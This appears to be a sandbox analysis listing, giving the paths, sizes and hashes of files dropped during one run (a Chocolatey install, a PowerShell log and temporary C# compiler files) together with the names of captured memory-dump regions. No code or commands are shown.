5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\chocolatey.zip

Filesize
280KB

MD5
85a5830c1dd49ba63ca3cd3c9954cf7d

SHA1
326c32873b10fff3948b1a6fdb956103c82f1be5

SHA256
fa33790534b9962dff6e0aa1e64d92ba186f849d0db8c0c9c550fa3f9558ba01

SHA512
ef419ac7e9a4ce8050907a4c70ff02d5b46bb0a48ce50893cba5e69437c3ebfe54fcc64d1c6e68e221b62da9f436f632b65945dff1dacea070c2842fe7b0e251

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\CREDITS.txt

Filesize
50KB

MD5
7677758586925baf4e9d7573bf12f273

SHA1
2f54bd889a52ccaca36df204a663b092ad8ab7b0

SHA256
4387f7836591fd9b384d5a11c22685d5441ed8f56a15dd962c28174f60d1b35b

SHA512
a425d55248b052810ee861fa75eb5c9c139f73aa70dfee406d59b7f1cf86fed5656d24b36db4f10a606be89a073305bc32bec822bf88ed53881323d6718fc001

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\LICENSE.txt

Filesize
670B

MD5
b4ecfc2ff4822ce40435ada0a02d4ec5

SHA1
8aaf3f290d08011ade263f8a3ab4fe08ecde2b64

SHA256
a42ac97c0186e34bdc5f5a7d87d00a424754592f0ec80b522a872d630c1e870a

SHA512
eafac709be29d5730cb4ecd16e1c9c281f399492c183d05cc5093d3853cda7570e6b9385fbc80a40ff960b5a53dae6ae1f01fc218e60234f7adced6dccbd6a43

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\choco.exe.manifest

Filesize
2KB

MD5
1b3ed984f60915f976b02be949e212cb

SHA1
30bccfed65aef852a8f8563387eb14b740fd0aa3

SHA256
d715d6071e5cdd6447d46ed8e903b9b3ad5952acc7394ee17593d87a546c17fc

SHA512
3ec5b3b09ef73992eabc118b07c457eb2ca43ce733147fd2e14cccde138f220aee8cb3d525c832a20611edb332710b32a2fc151f3075e2020d8fd1606007c000

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\ChocolateyTabExpansion.ps1

Filesize
27KB

MD5
c6a2d08fa0c9291b024917995ed9260c

SHA1
fc5c7f1dd3e969a58fa8f0f8bfcb9201cc08c111

SHA256
446c847134e051e02bacad5440f5ea4d5abd93fb77516bc6fbcf69f513bdc93f

SHA512
ebd4a037c326aff60f805ed87287a251a3b74b7dfce5c5b424807c276a677d1099b718f7ec2d17a231d67f03fa1e8dbfe8e5fe278d3bc0724733dc76f0ca0c25

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\chocolateyProfile.psm1

Filesize
13KB

MD5
0f2a17396042d22183d78e9e442729a2

SHA1
ffd86487d551c72e4c5b3005cb36a9deeaeee6c1

SHA256
c28ac729836dec5384322cbe19a32479126bac5195b6c2760a853340dff440ce

SHA512
4d506d0360b746edfa5ffecf97d47c1d0441e22387ad9336ec12f471aed6047fabb55ba6f2de3179bfad6ded5de308722993b1fd272d352de8fa6a1440dc14ae

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\chocolateyScriptRunner.ps1

Filesize
16KB

MD5
da6109561e78e82df57f2c69ed40d1a8

SHA1
b481392947e52a028b5a28ee7f491e5c08e49f49

SHA256
e075e523a693669b7b88a5c955e2823a98a88508b3016c5baa01e4afcb6b54cc

SHA512
e5da2666edb1037b38ffac9334b456e590c97de1cb02d487ca218bbb1dd2a41cd5f068337a78b31ec5decc85d70cc046c25314f903fb07fa71cf375d8fa53c86

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\redirects\RefreshEnv.cmd

Filesize
4KB

MD5
cc04b34e013e08cc6f4e0c66969c5295

SHA1
a33f1cb08b56828e3b742ee13cf789442dd5c12f

SHA256
8b6b1d8f6bfab3dc9fbee30d6b2f3093ea3eccd5c66e57161dbe1b8f703fa74c

SHA512
b485af21fcbb699d783e64e035595be7a117a1d6af62166c6d50ebd59ed8953141444f17f3bd07a865c9dd11aa7c75d5a4f2bdfb8b739a1668d055779f0d0c10

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\redirects\choco.exe

Filesize
142KB

MD5
e2ec62e46450d5e09e813929d97c00c7

SHA1
e22ef68df395516a8e8e13a9739578d1a48ec843

SHA256
924e37885d4b3b365225c773a6c4266ed7076494e3693ec487bec066ab5bc5f7

SHA512
5cf8ba3bfcba84cddd0f58966707681ac9067952c85412b576b0ce85b53029fd902c17273cbaba1712c99f9036e495943896a7960d8c7a5028d6b48228632743

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\redirects\choco.exe.ignore

Filesize
2B

MD5
81051bcc2cf1bedf378224b0a93e2877

SHA1
ba8ab5a0280b953aa97435ff8946cbcbb2755a27

SHA256
7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

SHA512
1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\7z.dll

Filesize
306KB

MD5
8ebb20bd5abed3d1d004bfa31ca96d01

SHA1
350ebf731e3d6d1daa13d111da36ea2b86ae73c7

SHA256
0b4e920f9b6fbfdee1d1fc9c979f7c71a3d361b9e62553b2e8a4ed37b69d1168

SHA512
58e7ffd436782494ed2fc08e2b35f4bb833a699c33adc1713dd4ec54cb8a71716801e0d187e92f0dcd298472ff591bc6ac5a6a0da5cfb07505961011311bf365

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\7z.dll.manifest

Filesize
513B

MD5
8f89387331c12b55eaa26e5188d9e2ff

SHA1
537fdd4f1018ce8d08a3d151ad07b55d96e94dd2

SHA256
6b7368ce5e38f6e0ee03ca0a9d1a2322cc0afc07e8de9dcc94e156853eae5033

SHA512
04c10ae52f85d3a27d4b05b3d1427ddc2afaccfe94ed228f8f6ae4447fd2465d102f2dd95caf1b617f8c76cb4243716469d1da3dac3292854acd4a63ce0fd239

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\7z.exe

Filesize
335KB

MD5
76a0b06f3cc4a124682d24e129f5029b

SHA1
404e21ebbaa29cae6a259c0f7cb80b8d03c9e4c0

SHA256
3092f736f9f4fc0ecc00a4d27774f9e09b6f1d6eee8acc1b45667fe1808646a6

SHA512
536fdb61cbcd66323051becf02772f6f47b41a4959a73fa27bf88fe85d17f44694e1f2d51c432382132549d54bd70da6ffe33ad3d041b66771302cc26673aec7

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\7zip.license.txt

Filesize
3KB

MD5
f4995e1bc415b0d91044673cd10a0379

SHA1
f2eec05948e9cf7d1b00515a69c6f63bf69e9cca

SHA256
f037e7689f86a12a3f5f836dc73004547c089e4a2017687e5e0b803a19e3888b

SHA512
e7bb1bacab6925978416e3da2acb32543b16b4f0f2289cc896194598ee9ade5c62aa746c51cf6bf4568e77e96c0a1014e4ddb968f18f95178ee8dfb1e5a72b96

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\checksum.exe

Filesize
37KB

MD5
c950a5b4cdc8b23c3b3f5d0358c8664f

SHA1
a4b49539c021ddd4457b353fb92bba68c4c25cdd

SHA256
c960a0082f589a4c1fa7c9cf60faed58cb4dbead4a42ca093e6f0d403d75db79

SHA512
0757fd2e8a31ee70dd0fa4c49a9f47783c1beff359cefcdc523461002571a2df59903f5beda78572fe079ad4af00d1749c6886f50db2db6c8da2971fa0323ddb

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\checksum.exe.config

Filesize
150B

MD5
e9ad5dd7b32c44f8a241de0e883d7733

SHA1
034c69b120c514ad9ed83c7bad32624560e4b464

SHA256
9b250c32cbec90d2a61cb90055ac825d7a5f9a5923209cfd0625fca09a908d0a

SHA512
bf5a6c477dc5dfeb85ca82d2aed72bd72ed990bedcaf477af0e8cad9cdf3cfbebddc19fa69a054a65bc1ae55aaf8819abcd9624a18a03310a20c80c116c99cc4

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\checksum.license.txt

Filesize
95B

MD5
a10b78183254da1214dd51a5ace74bc0

SHA1
5c9206f667d319e54de8c9743a211d0e202f5311

SHA256
29472b6be2f4e7134f09cc2fadf088cb87089853b383ca4af29c19cc8dfc1a62

SHA512
cae9f800da290386de37bb779909561b4ea4cc5042809e85236d029d9125b3a30f6981bc6b3c80b998f727c48eb322a8ad7f3b5fb36ea3f8c8dd717d4e8be55e

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\shimgen.exe

Filesize
88KB

MD5
e43b31d96b58b3f6a026e5c2f83519c3

SHA1
e437bea4dad225a06e8ae3d35cd68d88b7a38d76

SHA256
e4e1efa8e9ba14181c7dba0b8e39aaf40154a81eb5e8c2a905e6e914e37d2e08

SHA512
16a2c30d290e4b504cde53b231bf4d8040e19e825a91a4f76809df8e4f34def95f719688dd393920d49833b65d60b8ac18071fba9c4b93363f0c6ee1f9e00f60

Download Submit
C:\Windows\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\tools\shimgen.license.txt

Filesize
3KB

MD5
89ac7c94d1013f7b3e32215a3db41731

SHA1
1511376e8a74a28d15bb62a75713754e650c8a8d

SHA256
d4d2ef2c520ec3e4ecff52c867ebd28e357900e0328bb4173cb46996ded353f4

SHA512
9ba2b0029e84de81ffef19b4b17a6d29ee652049bb3152372f504a06121a944ac1a2b1b57c6b0447979d5de9a931186fef9bd0667d5358d3c9cb29b817533792

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
06d16fea6ab505097d16fcaa32949d47

SHA1
0c1c719831fa41cd102d0d72d61c0f46ec5b8de8

SHA256
54e15de2bef9f651d7717e2a336ac6b2ea2b723e6f29d2b153d8fbbc89aef723

SHA512
03c00f1eebb51cec11703141ae9d9c3ac589f5495bc04d8a4b043714089a9d50bd3a520e4d72b4a4c99f5b9bf5f689bf2585fa5c7d4ddbe6f71cbba0172f593a

Download Submit
\??\c:\Windows\Temp\3zttoivb\3zttoivb.0.cs

Filesize
363B

MD5
fe0a20ae8ae6560ff6da930c7a650c80

SHA1
b17a90207c3fd39abfcd37a79428961d401c0de6

SHA256
2887d6cced4527e90685dea484f31e882a7352ca66bdb5f5c7dd8924b6885dce

SHA512
d2505e75392877bc4bff0b9b145da35fb2c4fea86c6c6ee3ec7af06fb774abb27dd651242f6797e0e81127619a64662874cc1623262607de65fb332848de4531

Download Submit
\??\c:\Windows\Temp\3zttoivb\3zttoivb.cmdline

Filesize
333B

MD5
417263a561932dbb8c44e746ac17c20e

SHA1
c25b1ec024c70a3af04d877bb9ac2a3698023948

SHA256
a2b61defbcc71d37890c34f81314e85d95fb289a94a51ef8f24d4662a60b6bfa

SHA512
ec0ab93bfb04a72adf05391f51938015ee452b93d0d6fbd65b128004e0ae0291103680d284871b297578f5a26814bb3d8b4a8f43c33603693becf84409663637

Download Submit
\??\c:\Windows\Temp\3zttoivb\CSCA524BF80BD45486A9249B9D4CE57FA60.TMP

Filesize
652B

MD5
fee6d4f288340ee0949f09dcfca8ed70

SHA1
ad60d2c0481631f5b4c0717e6dadac39d217261b

SHA256
3c74793610558939fa7d4e39f65960535f89c790269276549af91289ff33d6cf

SHA512
81ea029b503ed4b4e691efb31687534cc62d4e71c74ac201d8049c7ca9c48b970e28874917198f1703fbd47621bdb208fa0d736a29d997cf232bf9e35b199220

Download Submit
memory/1004-2139-0x00000218DAF30000-0x00000218DAF4E000-memory.dmp

Filesize
120KB

Download
memory/1004-2157-0x00007FF85D230000-0x00007FF85DCF1000-memory.dmp

Filesize
10.8MB

Download
memory/1004-2103-0x00000218C2770000-0x00000218C27C0000-memory.dmp

Filesize
320KB

Download
memory/1004-2090-0x00000218DAF60000-0x00000218DAF70000-memory.dmp

Filesize
64KB

Download
memory/1004-2089-0x00000218C1340000-0x00000218C1DB8000-memory.dmp

Filesize
10.5MB

Download
memory/1004-2088-0x00007FF85D230000-0x00007FF85DCF1000-memory.dmp

Filesize
10.8MB

Download
memory/1356-1639-0x000002647B550000-0x000002647B562000-memory.dmp

Filesize
72KB

Download
memory/1356-1630-0x000002647B140000-0x000002647B15C000-memory.dmp

Filesize
112KB

Download
memory/1356-1604-0x00007FF85D230000-0x00007FF85DCF1000-memory.dmp

Filesize
10.8MB

Download
memory/1356-2162-0x00007FF85D230000-0x00007FF85DCF1000-memory.dmp

Filesize
10.8MB

Download
memory/1356-1606-0x0000026478B60000-0x0000026478B70000-memory.dmp

Filesize
64KB

Download
memory/1356-1605-0x0000026478B60000-0x0000026478B70000-memory.dmp

Filesize
64KB

Download
memory/1356-1638-0x0000026478B60000-0x0000026478B70000-memory.dmp

Filesize
64KB

Download
memory/1356-1617-0x0000026478B60000-0x0000026478B70000-memory.dmp

Filesize
64KB

Download
memory/1356-1640-0x000002647AF10000-0x000002647AF1A000-memory.dmp

Filesize
40KB

Download
memory/1356-1636-0x0000026478B60000-0x0000026478B70000-memory.dmp

Filesize
64KB

Download
memory/1356-1635-0x000002647B170000-0x000002647B17A000-memory.dmp

Filesize
40KB

Download
memory/1356-1634-0x000002647B160000-0x000002647B166000-memory.dmp

Filesize
24KB

Download
memory/1356-1633-0x000002647B130000-0x000002647B138000-memory.dmp

Filesize
32KB

Download
memory/1356-1632-0x000002647B180000-0x000002647B19A000-memory.dmp

Filesize
104KB

Download
memory/1356-1631-0x000002647B120000-0x000002647B12A000-memory.dmp

Filesize
40KB

Download
memory/1356-1840-0x0000026478B40000-0x0000026478B48000-memory.dmp

Filesize
32KB

Download
memory/1356-1629-0x000002647AEF0000-0x000002647AEFA000-memory.dmp

Filesize
40KB

Download
memory/1356-1628-0x000002647AF20000-0x000002647AFD5000-memory.dmp

Filesize
724KB

Download
memory/1356-1627-0x000002647AF00000-0x000002647AF1C000-memory.dmp

Filesize
112KB

Download
memory/4388-36-0x000001C9D97C0000-0x000001C9D97E2000-memory.dmp

Filesize
136KB

Download
memory/4388-53-0x00007FF85D230000-0x00007FF85DCF1000-memory.dmp

Filesize
10.8MB

Download
memory/4388-47-0x000001C9D76D0000-0x000001C9D76E0000-memory.dmp

Filesize
64KB

Download
memory/4388-48-0x000001C9D76D0000-0x000001C9D76E0000-memory.dmp

Filesize
64KB

Download
memory/4388-46-0x00007FF85D230000-0x00007FF85DCF1000-memory.dmp

Filesize
10.8MB

Download
memory/4388-49-0x000001C9D9CA0000-0x000001C9D9CE4000-memory.dmp

Filesize
272KB

Download
memory/4388-50-0x000001C9D9D70000-0x000001C9D9DE6000-memory.dmp

Filesize
472KB

Download
memory/4624-24-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/4624-6-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/4624-3-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/5044-10-0x0000000002720000-0x0000000002721000-memory.dmp

Filesize
4KB

Download
memory/5044-23-0x0000000000400000-0x0000000000712000-memory.dmp

Filesize
3.1MB

Download